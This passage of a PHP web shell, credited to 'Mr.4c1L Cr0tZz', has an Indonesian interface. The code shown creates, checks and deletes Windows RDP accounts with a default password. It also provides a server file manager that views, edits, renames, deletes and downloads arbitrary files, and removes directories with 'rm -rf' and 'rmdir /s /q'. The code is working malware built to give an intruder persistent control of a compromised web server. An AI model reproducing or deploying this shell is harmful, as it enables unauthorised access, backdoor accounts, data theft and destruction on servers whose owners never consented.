2003. if(preg_match("/$user/", exe("net user"))) {
2004. echo "[remove user: <font color=white>$user</font>] -> ";
2005. if($cek) {
2006. echo "<font color=white>Berhasil</font>";
2007. } else {
2008. echo "<font color=red>Gagal</font>";
2009. }
2010. } else {
2011. echo "[INFO] -> <font color=red>user <font color=white>$user</font> belum ada</font>";
2012. }
2013. } else {
2014. //
2015. }
2016. } else {
2017. echo "-- Create RDP --<br>
2018. <form method='post'>
2019. <input type='text' name='user' placeholder='username' value='Acil123' required>
2020. <input type='text' name='pass' placeholder='password' value='Acil123' required>
2021. <input type='submit' name='create' value='>>'>
2022. </form>
2023. -- Option --<br>
2024. <form method='post'>
2025. <input type='text' name='r_user' placeholder='username' required>
2026. <select name='opsi'>
2027. <option value='1'>Cek Username</option>
2028. <option value='2'>Ubah Password</option>
2029. <option value='3'>Hapus Username</option>
2030. </select>
2031. <input type='submit' name='s_opsi' value='>>'>
2032. </form>
2033. ";
2034. }
2035. } else {
2036. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
2037. }
2038. } elseif($_GET['act'] == 'newfile') {
2039. if($_POST['new_save_file']) {
2040. $newfile = htmlspecialchars($_POST['newfile']);
2041. $fopen = fopen($newfile, "a+");
2042. if($fopen) {
2043. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
2044. } else {
2045. $act = "<font color=red>permission denied</font>";
2046. }
2047. }
2048. echo $act;
2049. echo "<form method='post'>
2050. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
2051. <input type='submit' name='new_save_file' value='Submit'>
2052. </form>";
2053. } elseif($_GET['act'] == 'newfolder') {
2054. if($_POST['new_save_folder']) {
2055. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
2056. if(!mkdir($new_folder)) {
2057. $act = "<font color=red>permission denied</font>";
2058. } else {
2059. $act = "<script>window.location='?dir=".$dir."';</script>";
2060. }
2061. }
2062. echo $act;
2063. echo "<form method='post'>
2064. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
2065. <input type='submit' name='new_save_folder' value='Submit'>
2066. </form>";
2067. } elseif($_GET['act'] == 'rename_dir') {
2068. if($_POST['dir_rename']) {
2069. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
2070. if($dir_rename) {
2071. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2072. } else {
2073. $act = "<font color=red>permission denied</font>";
2074. }
2075. echo "".$act."<br>";
2076. }
2077. echo "<form method='post'>
2078. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
2079. <input type='submit' name='dir_rename' value='rename'>
2080. </form>";
2081. } elseif($_GET['act'] == 'delete_dir') {
2082. if(is_dir($dir)) {
2083. if(is_writable($dir)) {
2084. @rmdir($dir);
2085. @exe("rm -rf $dir");
2086. @exe("rmdir /s /q $dir");
2087. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2088. } else {
2089. $act = "<font color=red>could not remove ".basename($dir)."</font>";
2090. }
2091. }
2092. echo $act;
2093. } elseif($_GET['act'] == 'view') {
2094. echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2095. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
2096. } elseif($_GET['act'] == 'edit') {
2097. if($_POST['save']) {
2098. $save = file_put_contents($_GET['file'], $_POST['src']);
2099. if($save) {
2100. $act = "<font color=white>Saved!</font>";
2101. } else {
2102. $act = "<font color=red>permission denied</font>";
2103. }
2104. echo "".$act."<br>";
2105. }
2106. echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2107. echo "<form method='post'>
2108. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
2109. <input type='submit' value='Save' name='save' style='width: 500px;'>
2110. </form>";
2111. } elseif($_GET['act'] == 'rename') {
2112. if($_POST['do_rename']) {
2113. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
2114. if($rename) {
2115. $act = "<script>window.location='?dir=".$dir."';</script>";
2116. } else {
2117. $act = "<font color=red>permission denied</font>";
2118. }
2119. echo "".$act."<br>";
2120. }
2121. echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2122. echo "<form method='post'>
2123. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
2124. <input type='submit' name='do_rename' value='rename'>
2125. </form>";
2126. } elseif($_GET['act'] == 'delete') {
2127. $delete = unlink($_GET['file']);
2128. if($delete) {
2129. $act = "<script>window.location='?dir=".$dir."';</script>";
2130. } else {
2131. $act = "<font color=red>permission denied</font>";
2132. }
2133. echo $act;
2134. } else {
2135. if(is_dir($dir) === true) {
2136. if(!is_readable($dir)) {
2137. echo "<font color=red>can't open directory. ( not readable )</font>";
2138. } else {
2139. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
2140. <tr>
2141. <th class="th_home"><center>Name</center></th>
2142. <th class="th_home"><center>Type</center></th>
2143. <th class="th_home"><center>Size</center></th>
2144. <th class="th_home"><center>Last Modified</center></th>
2145. <th class="th_home"><center>Owner/Group</center></th>
2146. <th class="th_home"><center>Permission</center></th>
2147. <th class="th_home"><center>Action</center></th>
2148. </tr>';
2149. $scandir = scandir($dir);
2150. foreach($scandir as $dirx) {
2151. $dtype = filetype("$dir/$dirx");
2152. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
2153. if(function_exists('posix_getpwuid')) {
2154. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
2155. $downer = $downer['name'];
2156. } else {
2157. //$downer = $uid;
2158. $downer = fileowner("$dir/$dirx");
2159. }
2160. if(function_exists('posix_getgrgid')) {
2161. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
2162. $dgrp = $dgrp['name'];
2163. } else {
2164. $dgrp = filegroup("$dir/$dirx");
2165. }
2166. if(!is_dir("$dir/$dirx")) continue;
2167. if($dirx === '..') {
2168. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
2169. } elseif($dirx === '.') {
2170. $href = "<a href='?dir=$dir'>$dirx</a>";
2171. } else {
2172. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
2173. }
2174. if($dirx === '.' || $dirx === '..') {
2175. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
2176. } else {
2177. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
2178. }
2179. echo "<tr>";
2180. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
2181. echo "<td class='td_home'><center>$dtype</center></td>";
2182. echo "<td class='td_home'><center>-</center></th></td>";
2183. echo "<td class='td_home'><center>$dtime</center></td>";
2184. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
2185. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
2186. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
2187. echo "</tr>";
2188. }
2189. }
2190. } else {
2191. echo "<font color=red>can't open directory.</font>";
2192. }
2193. foreach($scandir as $file) {
2194. $ftype = filetype("$dir/$file");
2195. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2196. $size = filesize("$dir/$file")/1024;
2197. $size = round($size,3);
2198. if(function_exists('posix_getpwuid')) {
2199. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
2200. $fowner = $fowner['name'];
2201. } else {
2202. //$downer = $uid;
2203. $fowner = fileowner("$dir/$file");
2204. }
2205. if(function_exists('posix_getgrgid')) {
2206. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
2207. $fgrp = $fgrp['name'];
2208. } else {
2209. $fgrp = filegroup("$dir/$file");
2210. }
2211. if($size > 1024) {
2212. $size = round($size/1024,2). 'MB';
2213. } else {
2214. $size = $size. 'KB';
2215. }
2216. if(!is_file("$dir/$file")) continue;
2217. echo "<tr>";
2218. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
2219. echo "<td class='td_home'><center>$ftype</center></td>";
2220. echo "<td class='td_home'><center>$size</center></td>";
2221. echo "<td class='td_home'><center>$ftime</center></td>";
2222. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
2223. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2224. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
2225. echo "</tr>";
2226. }
2227. echo "</table>";
2228. if(!is_readable($dir)) {
2229. //
2230. } else {
2231. echo "<hr>";
2232. }
2233. echo "<center>Recode ".date("Y")." - <a href='www.facebook.com/Acil.payahh' target='_blank'><font color=gold>Mr.4c1L Cr0tZz</font></a></center>";
2234. }
2235. ?>
2236. </html>